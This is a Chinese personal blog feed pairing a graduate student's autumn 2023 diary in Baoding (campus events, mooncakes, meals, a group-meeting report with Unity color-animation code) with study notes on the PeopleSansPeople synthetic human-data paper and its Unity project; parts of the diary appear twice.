    ​ 河北雾霾又开始发作了,什么玩意!

    ​ 手机上的 PM 值居然没有显示得很高……

    jpg

    经典贪吃蛇

    ​ 冀大开始发月饼了,这个队伍又排得像只贪吃蛇,还是告辞😅。

    jpg

    冀大椒盐月饼

    ​ 最后傍晚吃饭的时候食堂又开始发月饼了,还不用排队,血赚。

    ​ 没得挑口味,给了我个椒盐味的🤨,上面还印着冀大校徽。看口味有点黑暗料理但吃起来还可以。

    9.28

    jpg

    群雁辞归鹄南翔

    ​ 敲键盘敲得终于有点烦了,这学期第一次出七一路东三环口。

    ​ 看着校门口外拿着行李箱熙熙攘攘的人群,哦假期要开始了啊。

    jpg

    嘎嘎嘎

    ​ 再体验体验第一次来冀大前逛的东湖公园。荷花早已凋谢,湖中还有几只鸭子在水中游曳。

    jpg

    花圃

    ​ 喜迎国庆,公园里摆起了花花。

    jpg

    携手邻里迎中秋拥抱祖国迎国庆

    ​ 突然觉得国庆假期这个概念变得好陌生了,去年被学校里边,前年被关学校外边了😅。

    jpg

    嘎嘎嘎

    ​ 回去要了半份烤鸭,但是皮太少了不好吃🤐,而且甜面酱加多了咸到发苦。

    9.29

    ​ 之前电瓶车电池充好了电但是发现还是骑不动,以为是没充上想再充一次,结果早上操作电瓶车电池的时候碰到老田了,简——直——窒——息。然后就在大群里被内涵了一波😅。

    祝大家中秋国庆佳节快乐!为了保证大家安心快乐过节,再次强调实验室安全管理规定:
    人走关灯、断电、锁门;加强安全用电意识,不使用违规电器,严禁在实验室给电动车电池充电!
    望大家严格执行,平安快乐过节!

    jpg

    不听话的车车

    ​ 在外面修车店充好了电,结果发现直接不通电,修车师傅拿万用电表一阵检查最后得出结论电池接触不良😅。

    jpg

    中秋赏日

    ​ 之前不回家的杰杰说买到了票要回家了,来一顿散伙饭🤨。

    ​ 去往未来石的路上看夕阳余晖。

    jpg

    京雄邻里 和美保定

    ​ 保定宣传名片:京雄邻里 和美保定。

    ​ 吹自己邻居不吹自己。

    jpg

    不好吃!

    ​ 点了一份田鸡和虾,但是好像没啥特色,价格也偏贵,拉黑拉黑🤐。

    jpg

    Get!

    ​ 饭后去抓娃娃机再消遣消遣。牛逼的杰杰又抓到一只皮卡丘,而我也抓了两次获得一只丑丑的小奶龙,喜提人生中第一支抓到的娃娃!

    jpg

    中秋赏月

    ​ 出来看到外面圆圆的月亮,第一次在外面过中秋,脑海里浮现起小时候背的关于思乡的古诗。什么“露从今夜白,月是故乡明”,什么“独在异乡为异客,每逢佳节倍思亲”之类的,哦这两首好像都不是写中秋的😅。看着大家一个一个返乡回家,本来一点也没有的想回家的念头也开始有点显现了。

    jpg

    保定户部巷

    ​ 未来石夜市里居然还有武汉户部巷烤面筋,绝。建议出一个三坊七巷百姓鲜捞。

    jpg

    中秋快乐!

    ​ 对面的未来紫金山祝我中秋节快乐。

    10.1

    jpg

    荔枝怪味烤鱼

    ​ 阳哥女朋友回家了,阳哥怕寂寞就又跑过来跟我们住了。

    ​ 还从来没有跟阳哥出去玩呢,于是三人决定再去未来石吃个饭看电影。

    ​ 为了照顾湖南的阳哥,只好点个微辣的烤鱼。阳哥说河北的微辣根本就不能算辣,我说河北的微辣辣的不行,果然这个微辣我还是受不了,最后还是拿了碗水泡着吃,地域差异是很严重了😅。

    ​ 保定其他地方吃的还蛮便宜,但万博和未来石里吃的是真的贵,我感觉比福州的万达还贵……

    jpg

    电影票

    ​ 然后看了篇国庆档电影——《志愿军:雄兵出击》。说实话感觉一般般,没什么亮点。同题材的不如《长津湖》和《集结号》。

    jpg

    国庆快乐!

    ​ 对面的未来紫金山祝我国庆节快乐。

    ]]>
    + 前言
            

    不知道开场白写啥好就随便乱写吧

    jpg

    9.18-10.1

    ​ 14 天中有 7 天里天是灰蒙蒙的……


    ​ 保定气候播报:

    1
    2
    3
    4
    # y 轴数据(假设为温度和 PM 值)
    y1 = [20, 12, 12, 14, 16, 15, 12, 15, 15, 12, 15, 10, 8, 8] # 当日最低温
    y2 = [31, 24, 26, 28, 28, 26, 21, 25, 26, 25, 26, 28, 26, 26] # 当日最高温
    y3 = [59, 60, 59, 61, 63, 53, 38, 50, 65, 124, 44, 72, 28, 42] # 当日 PM 值

    png

    正文

    9.21

    尊敬的各位领导、老师,亲爱的 2023 级新生、其他年级的同学们:
    ​ 新同学、新学期、新气象、新梦想
    ​ 河北大学网络空间安全与计算机学院研究生会、河北大学网络空间安全与计算机学院学生会诚邀大家参加“2023 年河北大学网络空间安全与计算机学院迎新晚会”。
    ​ 晚会时间:2023 年 9 月 21 日 19:00 - 21:00
    ​ 晚会地点:河北大学七一路校区邯郸音乐厅
    ​ 河北大学网络空间安全与计算机学院研究生会
    ​ 河北大学网络空间安全与计算机学院学生会

    ​ 要开始迎新晚会了🤔。一开始不太想去,后来觉得还是蛮去看看吧。

    png

    迎新晚会

    ​ 于是乎强行拽着舍友陪我去看了看,在看完班上同学的表演后觉得天色有点晚了就润了。比较喜欢的是其中的相声节目,声音听起来挺有河北风味的。

    9.22

    为进一步活跃学术氛围,加强高层次学术交流,提高我院师生科学研究素养,学院特邀陕西师范大学杨波教授,中国电子科技集团张文政研究员来我院进行学术报告。
    一、报告时间:2023 年 09 月 22 日 8:30-11:00
    二、报告地点:河北大学新校区 C1-535
    @所有人 8:15 入场签到


    @全体成员 咱们学院本周六要承办第十七届中国网络空间安全学科专业建设与人才培养研讨会,全体同学都要参加本次学科会议。本次学科会议邀请了沈昌祥院士和国内多所著名高校的院长作报告,上午在图书馆一楼报告厅,下午在图书馆二楼(209 和 211)。上午 8 点 15 分入场完毕,下午 1 点 40 分入场完毕。

    有几点注意事项:
    1、参加会议时注意会场纪律,不要交头接耳,不要接打电话,不要大声喧哗,不要随意走动。
    2、提前入场,手机静音,保持良好的秩序。
    3、着装整齐,不要穿拖鞋。
    4、开会时不要玩游戏。
    5、中场休息时,会场外设置有茶歇,建议大家礼貌谦让,专家领用后,同学们可以酌情领取。
    6、参会专家学者来自国内知名高校,同学们要体现良好的校风校貌,言行举止得体有礼,具备研究生应有的高素质面貌。


    ​ 又是撑场子大会,还要连着好几场……就当没看见嘻嘻嘻。


    ​ 这段时间河北气温转凉,估计又喜提感冒了😅,倒也没有其它的不舒服,后面就是一直鼻涕一直痰。今年第四次了,习惯了。然后就喜提今年第四瓶强力枇杷露。


    ​ 晚上又是组会,~~听伟哥吹牛逼~~好像也没啥好记录的。

    ​ 然后下次就要轮到自己汇报了。因为伟哥打算回家的缘故,组会挪到了下周一。

    ​ 这个时候大家都开始为准备国庆放假回家买票了,第一次在外面读书却还没有假期中途回家的想法,更没有提前看票的意识了。

    9.25

    伟哥😍😍😍
    生日快乐
    哈哈哈快乐快乐

    gif

    挂伟哥

    ​ 组会汇报前特意学了 Unity 的 DoTween 插件写了个动画挂伟哥😈,引得师门都哄笑起来:326 里充满了快活的空气。

    挂伟哥动画代码
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;
    using Unity.VisualScripting;

    public class ChangeColor : MonoBehaviour
    {
    [SerializeField] private bool isImage = true;
    private Image image;
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    if (isImage)
    {
    image = GetComponent<Image>();
    float H, S, V;
    Color.RGBToHSV(image.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    else
    {
    text = GetComponent<Text>();
    float H, S, V;
    Color.RGBToHSV(text.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    }

    private void changeColor(float H, float S, float V)
    {
    float newH = H + 0.01f;
    if (newH > 1)
    {
    newH = 0;
    }
    Tweener tweener = null;
    if (isImage)
    {
    tweener = image.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    else
    {
    tweener = text.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    tweener.OnComplete(()=> changeColor(newH, S, V));
    }
    }

    ​ 但是汇报完自己的工作后,导师觉得我所做的东西技术含量不太够,不好水一篇论文。又跟导师师兄一番唇枪舌剑,最后讲得自己满身汗,回去又洗了一次澡,喜提一日两洗。

    不知道在这里多少次我因为这个问题而内耗了,觉得自己所做的东西都是空中楼阁,没有什么实际意义,在这个实验室里也缺乏足够的指导和资源,绝大多数都要靠自己。一方面觉得咬咬牙硬着头皮就水过去了,一方面又觉得这真的值得吗?唉。正如师兄所说,这坨憋不出来的小论文像一把达摩克利斯之剑一样悬在头顶。

    ​ 伟哥因为买不到回河北的票,又把之前的票都退了,他是真不想家啊,牛逼。

    9.27

    jpg

    空气质量感人

    ​ 河北雾霾又开始发作了,什么玩意!

    ​ 手机上的 PM 值居然没有显示得很高……

    jpg

    经典贪吃蛇

    ​ 冀大开始发月饼了,这个队伍又排得像只贪吃蛇,还是告辞😅。

    jpg

    冀大椒盐月饼

    ​ 最后傍晚吃饭的时候食堂又开始发月饼了,还不用排队,血赚。

    ​ 没得挑口味,给了我个椒盐味的🤨,上面还印着冀大校徽。看口味有点黑暗料理但吃起来还可以。

    9.28

    jpg

    群雁辞归鹄南翔

    ​ 敲键盘敲得终于有点烦了,这学期第一次出七一路东三环口。

    ​ 看着校门口外拿着行李箱熙熙攘攘的人群,哦假期要开始了啊。

    jpg

    嘎嘎嘎

    ​ 再体验体验第一次来冀大前逛的东湖公园。荷花早已凋谢,湖中还有几只鸭子在水中游曳。

    jpg

    花圃

    ​ 喜迎国庆,公园里摆起了花花。

    jpg

    携手邻里迎中秋拥抱祖国迎国庆

    ​ 突然觉得国庆假期这个概念变得好陌生了,去年被学校里边,前年被关学校外边了😅。

    jpg

    嘎嘎嘎

    ​ 回去要了半份烤鸭,但是皮太少了不好吃🤐,而且甜面酱加多了咸到发苦。

    9.29

    ​ 之前电瓶车电池充好了电但是发现还是骑不动,以为是没充上想再充一次,结果早上操作电瓶车电池的时候碰到老田了,简——直——窒——息。然后就在大群里被内涵了一波😅。

    祝大家中秋国庆佳节快乐!为了保证大家安心快乐过节,再次强调实验室安全管理规定:
    人走关灯、断电、锁门;加强安全用电意识,不使用违规电器,严禁在实验室给电动车电池充电!
    望大家严格执行,平安快乐过节!

    jpg

    不听话的车车

    ​ 在外面修车店充好了电,结果发现直接不通电,修车师傅拿万用电表一阵检查最后得出结论电池接触不良😅。

    jpg

    中秋赏日

    ​ 之前不回家的杰杰说买到了票要回家了,来一顿散伙饭🤨。

    ​ 去往未来石的路上看夕阳余晖。

    jpg

    京雄邻里 和美保定

    ​ 保定宣传名片:京雄邻里 和美保定。

    ​ 吹自己邻居不吹自己。

    jpg

    不好吃!

    ​ 点了一份田鸡和虾,但是好像没啥特色,价格也偏贵,拉黑拉黑🤐。

    jpg

    Get!

    ​ 饭后去抓娃娃机再消遣消遣。牛逼的杰杰又抓到一只皮卡丘,而我也抓了两次获得一只丑丑的小奶龙,喜提人生中第一支抓到的娃娃!

    jpg

    中秋赏月

    ​ 出来看到外面圆圆的月亮,第一次在外面过中秋,脑海里浮现起小时候背的关于思乡的古诗。什么“露从今夜白,月是故乡明”,什么“独在异乡为异客,每逢佳节倍思亲”之类的,哦这两首好像都不是写中秋的😅。看着大家一个一个返乡回家,本来一点也没有的想回家的念头也开始有点显现了。

    jpg

    保定户部巷

    ​ 未来石夜市里居然还有武汉户部巷烤面筋,绝。建议出一个三坊七巷百姓鲜捞。

    jpg

    中秋快乐!

    ​ 对面的未来紫金山祝我中秋节快乐。

    10.1

    jpg

    荔枝怪味烤鱼

    ​ 阳哥女朋友回家了,阳哥怕寂寞就又跑过来跟我们住了。

    ​ 还从来没有跟阳哥出去玩呢,于是三人决定再去未来石吃个饭看电影。

    ​ 为了照顾湖南的阳哥,只好点个微辣的烤鱼。阳哥说河北的微辣根本就不能算辣,我说河北的微辣辣的不行,果然这个微辣我还是受不了,最后还是拿了碗水泡着吃,地域差异是很严重了😅。

    ​ 保定其他地方吃的还蛮便宜,但万博和未来石里吃的是真的贵,我感觉比福州的万达还贵……

    jpg

    电影票

    ​ 然后看了篇国庆档电影——《志愿军:雄兵出击》。说实话感觉一般般,没什么亮点。同题材的不如《长津湖》和《集结号》。

    jpg

    国庆快乐!

    ​ 对面的未来紫金山祝我国庆节快乐。

    ]]>
    @@ -4932,7 +4932,7 @@ /posts/Paper-PEOPLESANSPEOPLE-A%20Synthetic%20Data%20Generator%20for%20Human-Centric%20Computer%20Vision/ - 资源

    全文

    Abstract

    • 人脸检测和人体姿态估计的数据集多样性不够,还会受隐私、法律、安全和道德问题的影响。
    • 发布了一个以人为中心的合成数据生成器 PEOPLESANSPEOPLE。包含可模拟的 3D 人力资源、参数化照明和相机系统,并生成 2D 和 3D 边界框、实例和语义分割以及 COCO 姿势标签。
    • 使用 Detectron2 Keypoint R-CNN 变体进行了基准合成数据训练,以合成数据对网络进行预训练,使用真实数据进行微调,效果喜人。
    • 同样这个通过合成数据预训练的模型优于使用 ImageNet 预训练的模型。

    1 Introduction

    • 数据集需求量大。
    • 对于以人为中心的视觉任务来说,标记的数据越来越复杂。
    • 真实数据集涉及隐私和道德问题。
    • 一些动作的数据集难以采集。
    • 人工标注数据集容易出错。

    本文设计的合成数据生成器:PEOPLESANSPEOPLE,基于 Unity 和 Perception 软件包。包括:

    • macOS 和 Linux 二进制文件,能够使用 JSON 注释生成 1M 以上的大规模数据集
    • 28 个不同年龄和种族的 3D 人体模型,具有不同的服装、头发和皮肤颜色
    • 39 个动画剪辑,具有完全随机的人形位置、大小和旋转,以生成不同的人物安排;
    • 完全参数化的照明(位置、颜色、角度和强度)和相机设置;
    • 一组用作干扰物和遮挡物的对象基元;
    • 一组自然图像,用作对象的背景和纹理。

    除了上面提到的二进制文件外,我们还发布了一个 Unity 模板项目,通过帮助他们开始创建自己版本的以人为中心的数据生成器,帮助降低社区的进入门槛。此环境具有为二进制文件描述的全部功能,除了

    • 4 个不同服装颜色的3D人体模型示例;
    • 8 个示例动画剪辑,具有完全随机的人形放置、大小和旋转,以生成不同的人物安排;
    • Unity Perception 软件包中的一组杂货的自然图像,用作对象的背景和纹理。
    • 介绍一下合成数据生成器。

    • 领域随机化是一种通过随机化模拟器的参数来将多样性引入生成数据的技术。领域随机化已应用于包括物体检测、机器人操纵和自动驾驶汽车导航在内的任务。PEOPLESANSPEOPLE 使研究人员能够在涉及作为目标类别一部分的人的任务中使用具有领域随机化的合成数据,从而在现有和新领域扩展模拟器功能的空间,如自动驾驶汽车和人体姿态估计和跟踪。

    3 PEOPLESANSPEOPLE

    • PEOPLESANSPEOPLE 是一个参数化数据生成器,具有由各种姿势的 3D 人力资源和具有自然纹理的干扰对象填充的 3D 场景。我们将数据生成器打包为一个二进制文件,通过一个简单的 JSON 配置文件公开几个参数以供更改。

    • PEOPLESANSPEOPLE 通过 JSON 中的 2D 和 3D 边界框、语义和实例分割掩码以及 COCO 关键点标签为人力资源生成 RGB 图像和相应标签。此外,它还会发出用于统计比较和分析的场景元数据。

    3.1 3D Assets

    • PEOPLESANSPEOPLE拥有一套来自 RenderPeople 的 28 个扫描三维人体模型。这些模型在种族和年龄上都是多样化的,完全重新地形化、装配和蒙皮,具有高质量的纹理。

    • 我们不得不更改资产,以便在运行时操作服装的材料元素。具体来说,我们重新绘制了一些组成遮罩纹理的红色、绿色、蓝色和 alpha 通道。此外,我们在 Unity 中创建了一个 Shader Graph,它允许我们交换人力资源的材料元素,并更改衣服的色调和纹理。这些更改使我们能够将人体模型导入 Unity,将其放置在场景中,设置其动画,并更改其服装纹理和颜色。

    jpg

    PEOPLESANSPEOPLE 3D Human Models.
    a) 28 个扫描的 3D 人体模型,用于具有默认姿势和服装纹理的环境中。
    b) 由 PEOPLESANSPEOPLE 着色器图形启用的服装纹理变化的一个示例。
    • 为了为我们的人力资源生成不同的姿势,我们从 Mixamo 收集了一组 39 个动画,从空转、行走和跑步等简单动作到铺板、表演霹雳舞和打斗等更复杂的动作。我们以 24 帧/秒的速度下载了这些动画片段作为Unity 的 FBX,并且没有关键帧缩减。最后,我们确保将所有动画剪辑重新定位到我们的 RenderPeople 人力资源。

    3.2 Unity Environment

    • 我们使用 Unity 版本 2020.3.20f1 和 Unity 的 Perception 包0.9.0-preview.2 来开发 PEOPLESANSPELE。我们的 3D 场景包括背景墙、Perception 相机、一个定向光(太阳)、一个移动点光源和六个固定场景点光源。

    jpg

    PEOPLESANSPEOPLE Design.
    (a) 场景设置。该场景有一个背景墙、一个 Perception 相机、一个定向光(太阳)、一个移动点光源和六个固定点光源。
    (b), (c)和 (d) 示例模拟。每个图右下角的小相机预览窗格显示感知相机的渲染预览。我们更改墙背景纹理、点光源颜色、强度和位置,以及每帧中的阳光方向。我们还可以更改相机的视野、焦距、位置和方向。我们在墙前的场景中以不同的比例、姿势、服装纹理和围绕 Y 轴的旋转来生成人力资源。此外,我们在场景中生成具有不同方向、比例和纹理的原始遮挡对象。
    • 场景背景和照明 我们从一组 1600 幅自然图像中随机选择了一个背景墙纹理,这些图像取自 COCO 未标记的 2017 数据集。我们确保在这些自然图像中不会出现人类的照片(甚至是挂在墙上的人类相框)。我们还更改纹理的色调偏移。我们更改场景中六个点光源和一个平行光的颜色、强度和打开/关闭状态。此外,我们有一个移动的点光源,它可以改变位置和旋转。场景中的这组八个灯光产生不同的照明、阴影和场景外观。

    • Perception相机 Perception 相机扩展渲染过程以生成注释标签。在 PEOPLESANSPEOPLE 中,对于我们的基准实验,我们有一个对象类(人),我们为其生成 2D 边界框和人类关键点标签。使用 Unity Perception 软件包,我们可以包括语义和实例分割掩码以及 3D 边界框。

    • 我们的 2D 边界框和人体关键点遵循 COCO 数据集标准。关键点标签的可见性状态为:$v=0$ 未标记,$v=1$ 标记但不可见,$v=2$ 标记且可见,类似于 COCO。然而,我们不使用 $iscrowd=1$ 标签,因为即使在最拥挤的场景中,我们也可以生成亚像素完美标签。


    Perception 摄像头总共为用户提供了三种标签方案选择:

    • 可见对象

    • 可见和遮挡对象:在这种情况下,如果一个人被自己或另一个对象遮挡,则将其注释为可见($v=2$)。

    • 所有对象:在这种情况下,即使完全落在另一个对象后面的对象也会被注释。这对于人类跟踪和活动识别特别有用。


    • 场景中的对象 我们使用一组原始的 3D 游戏对象,例如立方体、圆柱体和球体,作为背景或遮挡/干扰对象。我们可以在场景中的任意位置、比例、方向、纹理和色调偏移处生成这些对象。我们使用与这些对象的背景墙相同的 COCO 未标记 2017 纹理。

    3.3 Domain Randomization

    • 为了使用可以推广到真实领域的合成数据来训练模型,我们依赖于领域随机化,其中模拟环境的各个方面被随机化,以将变化引入合成数据中。Unity Perception 软件包提供了一个领域随机化框架。在每一帧,随机化器作用于预定义的 Unity 场景组件。我们首先提供要随机化的组件的参数定义。然后我们定义我们希望这些参数如何分布。我们提供了正态分布、均匀分布和二项式分布,尽管也可以定义自定义分布。为了简单起见,PEOPLESANSPEOPLE 中的所有随机化器值都使用均匀分布。

    • 简言之,我们对 3D 对象的放置和姿势、场景中 3D 对象的纹理和颜色、照明的配置和颜色、相机参数以及一些后处理效果进行了随机化。某些类型的域随机化,如照明、色调偏移、相机旋转/视场/焦距,模拟标准数据增强的行为。因此,我们在合成数据训练期间不使用数据增强。

    我们的数据生成器中的领域随机化参数。

    jpg

    3.4 Data Generation

    在配备:

    • 2.3 GHz 8 核 Intel Core i9

    • AMD Radeon Pro 5500 M 4 GB

    • Intel UHD Graphics 630 1536 MB

    • 32 GB 2667 MHz DDR4内存

      的 MacBook Pro(16英寸,2019)上


    • PEOPLESANSPEOPLE 在大约 3 分钟内生成 $10\times10^3$ 图像、边界框和关键点标签。

    4 Experiments

    • 使用 Detectron2 Keypoint R-CNN 变体进行了基准合成数据训练,以合成数据对网络进行预训练,使用真实数据进行微调,并与 COCO 数据集作对比。

    4.1 Dataset Statistics

    jpg

    边界框占用热图。对于我们的基准实验,我们使用 640×640 的图像大小。我们使用填充框将所有边界框覆盖在图像上,以计算 COCO 个人和合成数据的边界框占用图。

    • 认为多样性也比那个基于给他爱的数据集要好。

    jpg

    与 COCO 相比,我们的合成数据集每个图像包含更多的实例(边界框)。

    4.2 Training

    将所有模型的:

    • 初始 learning rate 设置为 0.02
    • inital patience 设置为 38
    • 初始 epsilon 设置为 5
    • weight decay 设为 0.0001
    • momentum 设为 0.9
    • 在训练开始时执行 1000 次迭代的线性热身期(包括从头开始训练和迁移学习),在那里我们慢慢地将学习率提高到初始学习率
    • 我们使用 8 个 NVIDIA 特斯拉 V100 GPU,使用 synchronized SGD
      • 每个 GPU 的 mini-batch size 为 2。
    • 使用 ImageNet 的平均像素值和标准偏差来对模型中的图像进行归一化

    real-world dataset

    • 我们将 COCO 训练集划分为重叠的子集
      • 这些子集包含 641、6411、32057 和 64115 个图像,分别包含COCO训练集中的1%、10%、50% 和 100%,以研究 few-shot transfer。
      • 较小的集合是较大集合的子集。
    • 我们在 train 期间使用 person COCO验证集进行 validation。
    • 我们报告了我们使用 COCO test-dev2017 数据集进行的所有COCO训练数据实验的最终模型性能。
    • 我们为我们的合成数据集从 $3$ 个随机种子中生成了 $3$ 个 $500×10^3$ 图像的数据集。我们将它们分为 $490\times 10^3$ 训练集和 $10×10^3$ 验证集。我们使用合成验证集在纯合成数据上从头开始训练期间评估模型。
    • 训练后,我们使用 person COCO 验证和 test-dev2017 集合报告这些模型的性能。

    benchmark experiments

    • 我们首先从头开始训练我们的模型,并在 COCO 验证集和 COCO test-dev2017 集上评估它们的性能。
    • 其次,我们使用在合成数据上训练的模型的权重,并在有限的 COCO(真实)数据子集上对其进行微调,以进行 few-shot transfer。
    • 为了进行完整的比较,我们还使用 ImageNet 预训练的权重并对 COCO 数据子集进行微调。
    • 在 few-shot transfer 学习训练中,我们对所有网络层进行了重新训练。对于从头开始训练的模型和少镜头迁移学习,超参数和学习率时间表是相同的。

    5 Results

    • 仅使用合成数据效果还是差些,但是合成数据和真实数据混合就很好使了。

    5.1 Dicussion

    • 我们令人鼓舞的结果开启了对超参数搜索、优化策略、训练计划和替代训练策略的进一步研究,以弥合模拟与现实的差距。

    6 Conclusion and Limitations

    • 由于 RenderPeople 的再分配和许可政策,我们不提供对 3D 人力资产的直接访问;相反,我们提供了详细的说明和示例,用于采购和准备人力资产模拟。尽管预先制作的 PEOPLESANSPEOPLE 二进制文件无法实现复杂的资产结构化放置,但研究人员可以更新提供的随机化器,以允许不同的策略。

    代码

    该存储库提供了 PeopleSansPeople Unity 环境模板在 HDRP 中的版本。该项目包括自定义的随机化功能和一些由 Unity Technologies 提供的示例人类资源。

    该环境仍然提供了我们在论文中介绍的 PeopleSansPeople 的全部功能,以及我们提供的 Linux 和 macOS 二进制文件。鉴于我们没有重新分发许可证的第三方资产,我们提供以下示例资产/内容:

    • 4 个带有不同服装颜色但外观相同的 Unity 品牌资产。
    • 529 个 Unity 食品杂货纹理。
    • 8 个由 Unity 拥有的动画剪辑。

    该 Unity 环境的目的是使社区能够开始构建自己版本的以人为中心的数据生成器,降低进入门槛,并为他们提供与 **PeopleSansPeople **中存在的所有功能相同的功能。用户可以轻松地将该项目中的资产和内容与自己的资产进行替换,只要其属性与我们提供的示例资产相匹配即可。

    ​ 装一个 Unity 3.20f1,然后直接跑 PeopleSansPeople/peoplesanspeople_unity_env at main · Unity-Technologies/PeopleSansPeople (github.com),但不知道是哪里有问题,加载得贼慢,还容易卡死。emmmm

    第二天进来感觉正常了。

    jpg


    HumanScene.unity 中有如下对象:

    • Main Camera
    • Wall
    • Simulation Scenario
    • Post Process Volume
    • Sky and Fog Volume
    • Lights
      • DirectionalLightSun
      • PointLight1
      • PointLight2
      • PointLight3
      • PointLight4
      • PointLight5
      • PointLight6
      • PointLightSceneMoving

    Main Camera

    jpg

    Perception Camera

    • First capture at 0seconds and consecutive captures every 0.0166seconds of simulation time.

      在 0 秒处首次捕获,每 0.0166 秒模拟时间连续捕获一次。

    • Camera Labelers

      标注的数据有

      • BoundingBox2DLabeler

        2D 包围框

      • ObjectCountLabeler

        对象计数

      • RenderedObjectinfoLabeler

        渲染对象信息(这是干啥的?)

      • SemanticSegmentationLabeler

        语义分割

      • KeypointLabeler

        关键点

      • Animation Pose Configs

        动作动画

      • InstanceSegmentationLabeler

        实例分割

    CustomAnnotationAndMetricReporter

    ​ 这段代码是一个自定义的注解和指标报告器脚本,用于在 Unity 中使用 Perception 包合成数据集。下面是代码的主要含义:

    1. 通过添加 [RequireComponent(typeof(PerceptionCamera))] 属性,确保脚本附加到了带有 PerceptionCamera 组件的游戏对象上。(说明所有跟输出数据标注有关的都与 PerceptionCamera 有关)
    2. 定义了一些变量来存储指标的定义,例如光源位置、旋转、强度和颜色,以及摄像机位置、旋转、视野和焦距的指标定义。
    3. Start() 方法中,使用 DatasetCapture.RegisterMetricDefinition() 注册了所有的指标定义,并为每个指标定义分配了一个唯一的 ID。
    4. Update() 方法中,通过遍历 lightSources 数组,报告了每个光源的位置、旋转、强度和颜色。这里使用了 DatasetCapture.ReportMetric() 方法来报告指标的值。
    5. 还报告了摄像机的位置、旋转、视野和焦距。
    6. 注释掉的代码是一个示例,展示了如何在相机的局部空间计算目标物体的位置,并使用 GetComponent<PerceptionCamera>().SensorHandleReportAnnotationValues() 方法报告注释值。

    ​ 总之,这段代码的目的是在 Unity 中使用 Perception 包捕捉并报告指标和注释,其中包括光源和摄像机的位置、旋转、强度、颜色等信息,以及目标物体的边界框注释(注释部分被注释掉了)。

    CustomCameraRandomizerTag

    ​ 相机随机化的标签。

    Wall

    jpg

    HueOffsetRandomizerTag

    色调偏移随机化的标签。

    TextureRandomizerTag

    纹理随机化的标签。

    Background Object

    包含以下 Tag:

    • CustomBackgroundOccluderScaleRandomizerTag

      比例随机化的标签

    • HueOffsetRandomizerTag

      色调偏移随机化的标签

    • TextureRandomizerTag

      纹理随机化的标签

    • RotationRandomizerTag

      旋转随机化的标签

    Foreground Object

    jpg

    拥有:

    • Shader Graph Texture Randomizer Tag

      着色器纹理随机化的标签

    • Rotation Randomizer Tag

      旋转随机化的标签

    • Custom Foreground Rotation Randomizer

      前景物体旋转随机化的标签(我觉得把上面那个标签给覆盖了)

    • Labeling

      • 挂着人物和动作的标签
    • Animation Randomizer Tag

      动画随机化的标签

    • CustomForegroundScaleRandomizerTag

      前景物体缩放随机化的标签

    • Keypoint Occlusion Overrides

      关键点遮挡覆盖

      • Overrides the default occlusion distance values by a scalar. This is necessary for bodies with different body types (i.e. children should be less than one)
      • 用标量覆盖默认遮挡距离值。这对于不同体型的身体是必要的(即儿童应该小于一个)

    Simulation Scenario

    jpg

    Fixed Length Scenario

    Scenario Properties

    Scenario 通过应用随机化参数来控制模拟的执行流。确保场景中始终只有一个方案处于活动状态。

    Randomizers

    Randomizers 按以下顺序执行。您可以通过使用手柄向上或向下拖动随机发生器来更改顺序。

    • CustomBackgroundObjectPlacementRandomizer

      • 控制 background object 放置,X 轴和 Y 轴范围在 $[-7.5,7.5]$ 之间,Depth Vaule 即为 Z 轴,范围为 $[-10, 14]$。
      • 各个 background object 间隔不小于 $2.5$。
    • CustomBackgroundOccluderScaleRandomizer

      • 控制 background object 比例,范围在 $[1, 12]$ 之间。
    • CustomForegroundObjectPlacementRandomizer

      • 控制 foreground object 放置,X 轴和 Y 轴范围在 $[-7.5,7.5]$ 之间,Depth Vaule 即为 Z 轴,范围为 $[-9, 6]$。
      • 各个 foreground object 间隔不小于 3。
    • CustomForegroundScaleRandomizer

      • 控制 foreground object 比例,范围在 $[0.5, 3]$ 之间。
    • TextureRandomizer

      • 从列表中随机选一个纹理。
    • HueOffsetRandomizer

      • 色调偏移范围:$[-180, 180]$
    • RotationRandomizer

      • XYZ 轴 $[0, 360]$ 随机乱转。
    • CustomForegroundRotationRandomizer

      • 限制了只有 Y 轴可以 $[0, 360]$ 随机乱转,大概是为了确保生成的图片中人的脚垂直向下。
    • SundayAngleRandomizer

      • 随机化太阳光的
        • 小时
        • 日期
        • 纬度
    • AnimationRandomizer

      • 随机化动作,这里的相关逻辑写到了 AnimationRandomizerTag.cs 里?
    • ShaderGraphTextureRandomizer

      • 以下纹理 / 材质中从列表中随机选一项

        • Albedo Texture

          反照率纹理

        • Normal Texture

          法线纹理

        • Mask Texture

          遮罩纹理

        • Character Material

          人物材质

    • CustomCameraRandomizer

      • Camera Field Of View Parameter

        视野随机化范围 $[5, 50]$

      • Camera Focal Length Parameter

        焦距随机化范围 $[1, 23]$

      • Muliply Factor: $5$

        • Change Camera Position: $1$

          与初始位置的位置偏移,XYZ 轴范围 $[-5, 5]$

        • Change Camera Rotation: $1$

          初始旋转的旋转偏移,XYZ 轴范围 $[-5, 5]$

    • CustomLightRandomizer

      • Light Intensity Parameter
        • 范围 $[0, 1]$,但是在 CustomLightRandomizerTag 里还要乘个系数,所以最终亮度范围是 $[5000, 20000]$
      • Light Color Parameter
        • RGB 范围 $[0, 1]$,不透明度 A 恒为 1
      • Aux Parameter
        • 辅助参数,不知道干啥的,范围 $[0, 1]$
    • CustomLightPositionRotationRandomizer

      • Multiply Factor: $5$
      • Random Float: $[0, 1]$
      • Change Light Position: $0.73$
        • 灯光与初始位置的位置偏移:$[-3.65, 3.65]$($5\times 0.73=3.65$)
      • Change Light Rotation: $10$
        • 初始旋转的旋转偏移:$[-50, 50]$($10\times5=50$)
    • CustomPostProcessVolumeRandomizer

      后期处理随机化器

      • Vignette Intensity Parameter

        渐晕强度:$[0, 0.5]$

      • Fixed Exposure Parameter

        固定曝光:$[5, 10]$

      • White Balance Temperature Parameter

        白平衡色温:$[-20, 20]$

      • Film Grain Intensity Parameter

        薄膜颗粒强度参数:$[0, 1]$

